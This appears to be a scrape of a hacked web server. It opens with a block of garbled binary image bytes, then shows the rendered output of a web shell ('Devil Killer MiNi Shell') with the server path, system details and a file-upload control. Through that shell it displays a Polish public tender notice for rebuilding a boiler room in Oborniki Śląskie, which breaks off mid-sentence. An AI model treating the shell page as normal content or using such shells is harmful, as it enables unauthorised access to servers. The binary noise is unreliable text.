JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240717/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20240717/0041733501-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> ,,Przebudowa kotłowni w budynku mieszkalnym jednorodzinnym wolnostojącym w Obornikach Śląskich” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Skarb Państwa - Państwowe Gospodarstwo Leśne Lasy Państwowe Nadleśnictwo Oborniki Śląskie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 931024037</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Wrocławska 12</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Oborniki Śląskie</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">55-120</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL518 - Wrocławski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">71 3105760</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">71 3105761</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">oborniki@wroclaw.lasy.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.oborniki.wroclaw.lasy.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inna państwowa jednostka organizacyjna nieposiadająca osobowości prawnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> gospodarka leśna </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> ,,Przebudowa kotłowni w budynku mieszkalnym jednorodzinnym wolnostojącym w Obornikach Śląskich” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-7393bee2-e06b-4bad-99aa-e0f0b5e2d8b4</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00417335</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-07-17</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00297081/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 „Przebudowę kotłowni i wymiana pieca w 4 budynkach mieszkalnych Nadleśnictwa Oborniki Śląskie”.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://wroclaw-lasy.logintrade.net <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://wroclaw-lasy.logintrade.net</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.Sposób sporządzenia dokumentów<br/>elektronicznych musi być zgody z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. r.<br/>w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz<br/>środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020 r., poz. 2452)<br/>oraz w rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków<br/>dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy (Dz. U. z 2020 r. poz. 2415).<br/>Niniejsze postępowanie prowadzone jest w języku polskim.2.W celu skorzystania z Platformy konieczna jest rejestracja Wykonawcy<br/>pod<br/>adresem: https://wroclaw-lasy.logintrade.net po kliknięciu na przycisk „Załóż konto”. Wykonawca rejestrując się akceptuje warunki<br/>korzystania z Platformy, określone w Regulaminie podczas rejestracji oraz uznaje go za wiążący. Korzystanie z Platformy jest<br/>bezpłatne. Podgląd i pobieranie dokumentacji<br/>postępowania nie wymaga logowania. 3.Zamawiający, informuje, że Platforma jest kompatybilna ze wszystkimi podpisami<br/>elektronicznymi. Do przesłania dokumentów i złożenia oferty nie jest niezbędne posiadanie certyfikatu kwalifikowanego.<br/>4.Wymagania techniczne związane z korzystaniem z Platformy przetargowej – wskazane są w regulaminie i instrukcji dostępnych na<br/>stronie internetowej Platformy przetargowej - pod adresem: https://wroclaw-lasy.logintrade.net. Regulamin korzystania z Platformy -<br/>załącznik nr 11 do SWZ 5. Maksymalny rozmiar plików przesyłanych za pośrednictwem platformy https://wroclaw-lasy.logintrade.net<br/>wynosi 150 MB 6.Za datę przekazania oferty przyjmuje się datę jej złożenia na platformie https://wroclaw-lasy.logintrade.net Za datę<br/>przekazania wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub cyfrowych odwzorowań dokumentów w postaci<br/>papierowej (elektronicznych kopii dokumentów stworzonych w postaci papierowej) oraz innych informacji przyjmuje się datę ich<br/>przekazania na adres poczty elektronicznej Zamawiającego wskazany w pkt 11.1 SWZ lub złożenia na platformie https://wroclawlasy.<br/>logintrade.net 7.Złożenie oferty:a) Wykonawca składa ofertę za pośrednictwem formularza dostępnego na platformie (załącznik<br/>nr 6) Niezbędne wymagania techniczne umożliwiające pracę na platformie https://wroclaw- lasy.logintrade.net/ tj. opisane zostały w<br/>Regulaminie korzystania z platformy https://wroclaw-lasy.logintrade.net/ , stanowiącym załącznik nr 11 do SWZ oraz w Instrukcji<br/>dostępnej na platformie Logintrade .</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Klauzula informacyjna została zawarta w rozdziale XXII SWZ<br/>Stosownie do art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie<br/>ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych osobowych)(Dz. Urz. UE L 119 z 04 maja 2016 r., str. 1 –<br/>„RODO”) Zamawiający informuje, iż administratorem danych osobowych jest Nadleśnictwo Oborniki Śląskie Adres siedziby: ul.<br/>Wrocławska 12, 55-120 Oborniki Śląskie<br/>Tel.: 71 3105760<br/>Fax: 71 3105761 .<br/>Administrator wyznaczył Inspektora Ochrony Danych Osobowych p. Joanna Krupska z którym w sprawach dotyczących<br/>przetwarzania danych osobowych można skontaktować się za pośrednictwem poczty elektronicznej pod adresem iod@comp-net.pl<br/>lub telefonicznie pod numerem 796 400 543.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Klauzula informacyjna została zawarta w rozdziale XXII SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">SA.270.1.2.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.5.) Łączna wartość poszczególnych części zamówienia: <span class="normal"> 283556,18 PLN </span> </h3> <h3 class="mb-0">4.1.6.) Wartość zamówienia stanowiącego przedmiot tego postępowania (bez VAT): <span class="normal"> 75106,43 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest przebudowa kotłowni i wymiana kotła w budynku mieszkalnym nadleśniczówki, Adres: ul. Łokietka 41, 55-120 Oborniki Śląskie, działka nr ewid. 148 AM-15, obręb ew. Miasto Oborniki Śląskie, gmina: Oborniki Śląskie, powiat: trzebnicki, polegająca na wymianie kotła obecnie istniejącego na kocioł V klasy na drewno zgazowywane. Praca kotła polegać będzie na zgazowaniu drewna (odwrotne spalanie) z wtórnym spalaniem gazu drzewnego, dzięki czemu zapewni to optymalne spalanie wszystkich składników palnych. Proces dostawy powietrza i spalania kontrolowany będzie za pomocą wentylatora wyciągowego. Kocioł musi spełniać limity europejskich regulacji dla produktów przyjaznych środowisku. Przedmiot zamówienia obejmuje: demontaż i utylizację starego kotła wraz ze starą instalacją w obrębie kotłowni (wymagane udokumentowanie utylizacji, potwierdzające wykonanie jej zgodnie z obowiązującymi przepisami prawnymi), zainstalowanie nowego kotła ze zbiornikami akumulacyjnymi, instalacja c.o., wodna i kanalizacyjna, instalację urządzenia bezpieczeństwa, wymianę zasobnika ciepłej wody użytkowej, wymianę pompy. Pompa obiegowa przeznaczona będzie do przetłoczenia wody czystej w instalacji centralnego ogrzewania. Kocioł należy zlokalizować w istniejących kotłowniach. Wykonawca zobowiązany będzie do prac naprawczych po robotach instalacyjnych (m.in.: ściany, podłogi, przekucia itp.).<br/>Roboty zostaną wykonane zgodnie z warunkami prowadzonego postępowania, w tym Projektem umowy załącznik nr 8 do SWZ oraz Dokumentacją projektową -Projekt techniczny, Specyfikacją Techniczną Wykonania i Odbioru Robót Budowlanych i Przedmiar robót, który ma charakter pomocniczy, a także ofertą wykonawcy, obowiązującymi przepisami, polskimi normami budowlanymi, sztuką budowlaną, Ustawą Prawo Budowlane, zasadami wiedzy technicznej oraz należytą starannością w ich wykonywaniu, bezpieczeństwem, dobrą jakością i właściwą organizacją i Wytycznymi prowadzenia robót budowlanych w Państwowym Gospodarstwie Leśnym Lasy Państwowe – załącznik nr 10 do SWZ </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45331100-7 - Instalowanie centralnego ogrzewania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">44621220-7 - Kotły grzewcze centralnego ogrzewania</p> <p class="mb-0">45331110-0 - Instalowanie kotłów</p> <p class="mb-0">45332000-3 - Roboty instalacyjne wodne i kanalizacyjne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">45 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Kryterium I - Cena brutto (C) – waga 60% <br/>Kryterium II - Termin gwarancji na wykonane roboty budowlane (G) waga 40 %<br/>Przy ocenie ofert wartość wagowa wyrażona w (%) zostanie wyrażona w punktach (1% = 1pkt.)<br/>1)	Kryterium I - Cena brutto (C) – waga 60 % Oferta z najniższą ceną brutto otrzyma maksymalną ilość punktów, a pozostałym ofertom zostanie przypisana odpowiednio mniejsza liczba punktów, zgodnie ze wzorem:<br/><br/> Oferta o najniższej cenie brutto<br/> C = ------------------------------------------------ x 100pkt x waga kryterium tj. 60 %<br/> Cena brutto oferty badanej <br/> gdzie: C - wartość punktowa badanej oferty<br/>Z uwagi na postanowienia art. 225 ust. 1 PZP, jeżeli złożono ofertę, której wybór prowadziłby do powstania u Zamawiającego obowiązku podatkowego zgodnie z przepisami o podatku od towarów i usług, Zamawiający w celu oceny takiej oferty dolicza do przedstawionej w niej ceny podatek od towarów i usług, który miałby obowiązek rozliczyć zgodnie z tymi przepisami.<br/><br/>2)	Kryterium II - Termin gwarancji (G) – waga 40 %. W ramach kryterium “Termin gwarancji na wykonane roboty budowlane”, Zamawiający przyzna dodatkowe punkty za wydłużenie minimalnego okresu gwarancji, ocena ofert zostanie dokonana zgodnie z poniższymi zapisami:<br/><br/> Termin gwarancji w ofercie ocenianej<br/> G = ------------------------------------------------ x 100 pkt x waga kryterium 40 %<br/> Najdłuższy termin gwarancji wśród badanych ofert<br/> <br/>Gdzie: G – wartość punktowa badanej oferty<br/>Wykonawca zobowiązany jest podać okres gwarancji w pełnych miesiącach. Oferowany przez Wykonawcę okres gwarancji nie może być krótszy niż 36 miesięcy (minimalny wymagany przez Zamawiającego okres gwarancji) oraz dłuższy niż 60 miesięcy.<br/>Okres dłuższy niż 60 miesięcy dla potrzeb obliczania punktacji będzie traktowany jak 60 miesięcy.<br/>Jeżeli Wykonawca nie poda w ofercie okresu gwarancji to Zamawiający przyjmuje, że Wykonawca oferuje okres 36 miesięcy i ten okres zostaje przyjęty do ustalenia punktacji. W przypadku zaoferowania okresu gwarancji krótszego niż 36 miesięcy oferta Wykonawca będzie podlegała odrzuceniu.<br/>Ostateczną ocenę oferty stanowi suma punktów uzyskanych w kryteriach określonych w pkt 17.2 SWZ obliczona wg wzoru:<br/>O = C + G - ostateczna ocena danej oferty<br/>C - wartość punktowa uzyskana przez badaną ofertę za kryterium cena<br/>G - wartość punktowa uzyskana przez badaną ofertę za kryterium termin gwarancji<br/>Ocenie w ramach kryterium „Cena” podlegać będzie cena łączna brutto podana w Formularzu Oferty (Załącznik nr 6 do SWZ).<br/>Za najkorzystniejszą ofertę uznana zostanie Oferta Wykonawcy, która uzyska największą liczbę punktów.<br/>Jeżeli nie można dokonać wyboru najkorzystniejszej oferty ze względu na to, że zostały złożone oferty o takiej samej cenie, Zamawiający wzywa Wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez Zamawiającego ofert dodatkowych zawierających nową cenę.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin gwarancji na wykonane roboty budowlane</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1) zdolności do występowania w obrocie gospodarczym<br/>Zamawiający nie formułuje warunku udziału w postępowaniu w odniesieniu do warunku zdolności do występowania w<br/>obrocie gospodarczym<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej.<br/>Zamawiający nie formułuje warunku udziału w postępowaniu w odniesieniu do warunku posiadania uprawnień do<br/>prowadzenia określonej działalności gospodarczej lub zawodowej.<br/>3) sytuacji ekonomicznej lub finansowej<br/>Zamawiający nie stawia szczególnych wymagań w zakresie opisu spełniania warunku udziału w postępowaniu w<br/>odniesieniu do warunku dot. zdolności ekonomicznej lub finansowej.<br/>4) zdolności technicznej lub zawodowej.<br/>a. Zamawiający nie formułuje warunku udziału w postępowaniu w odniesieniu do potencjału technicznego.<br/>b. Warunek ten, w zakresie doświadczenia, zostanie uznany za spełniony, jeśli Wykonawca wykaże, że w okresie ostatnich 5 lat od dnia, w którym upływa termin składania ofert, a jeżeli okres prowadzenia działalności jest krótszy<br/>– w tym okresie, zrealizował co najmniej 2 roboty budowlane obejmujące swoim zakresem instalację kotła na paliwo stałe<br/>c. Zamawiający nie formułuje warunku udziału w postępowaniu w odniesieniu do osób skierowanych przez Wykonawcę do<br/>realizacji zamówienia <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu<br/>potwierdzenia spełniania warunków udziału w postępowaniu, o których mowa w pkt 8.1.SWZ Zamawiający przed udzieleniem<br/>zamówienia, działając na podstawie art. 274 ust. 1 PZP wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia<br/>w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, aktualnych na dzień złożenia następujących podmiotowych<br/>środków dowodowych:<br/>a) wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest<br/>krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te<br/>zostały wykonane (wzór wykazu wykonanych robót budowlanych stanowi załącznik nr 5 do SWZ).<br/>Jeżeli Wykonawca powołuje się na doświadczenie w realizacji robót budowlanych wykonanych wspólnie z innymi wykonawcami<br/>wykaz, o którym mowa wyżej dotyczy robót budowlanych, w których wykonaniu wykonawca ten bezpośrednio uczestniczył.<br/>Okres wyrażony w latach, o którym mowa wyżej, liczy się wstecz od dnia w którym upływa termin składnia ofert.<br/>b) dowodów określających, że wskazane przez Wykonawcę roboty budowlane na potwierdzenie spełnienia warunku udziału w<br/>postępowaniu dot. zdolności technicznej lub zawodowej w zakresie doświadczenia zostały wykonane należycie.<br/>Dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane<br/>były wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne<br/>odpowiednie dokumenty.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu potwierdzenia braku<br/>podstaw do wykluczenia, o których mowa w pkt 7.1. i 7.3. Zamawiający przed udzieleniem zamówienia, działając na podstawie art.<br/>274 ust. 1 PZP wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym<br/>niż 5 dni od dnia wezwania, odrębnie dla każdej części aktualnych na dzień złożenia następujących podmiotowych środków<br/>dowodowych:<br/>a) oświadczenia Wykonawcy, w zakresie art. 108 ust. 1 pkt 5) PZP, o braku przynależności do tej samej grupy kapitałowej, w<br/>rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (tekst jedn. Dz. U. z 2020 r. poz. 1076 z późn.<br/>zm.), z innym Wykonawcą, który złożył odrębną ofertę lub ofertę częściową, albo oświadczenie o przynależności do tej samej grupy<br/>kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty lub oferty częściowej niezależnie od<br/>innego Wykonawcy należącego do tej samej grupy kapitałowej - (wzór oświadczenia Wykonawcy w zakresie art. 108 ust. 1 pkt 5<br/>PZP o przynależności lub braku przynależności do tej samej grupy kapitałowej stanowi załącznik nr 4 do SWZ),<br/>b) odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w<br/>zakresie art. 109 ust. 1 pkt 4) PZP, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy<br/>wymagają wpisu do rejestru lub ewidencji,<br/>c) oświadczenia wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 PZP, w zakresie<br/>podstaw wykluczenia z postępowania określonych w: a) art. 108 ust. 1 pkt 3 PZP, b) art. 108 ust. 1 pkt 4 PZP dotyczących<br/>orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem środka zapobiegawczego, c) art. 108 ust. 1 pkt 5 PZP dotyczących<br/>zawarcia z innymi wykonawcami porozumienia mającego na celu zakłócenie konkurencji, d) art. 108 ust. 1 pkt 6 PZP, e) art. 109 ust.<br/>1 pkt 5 i 7 PZP - (wzór oświadczenie Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust.1 PZP w zakresie podstaw wykluczenia z postępowania stanowi załącznik 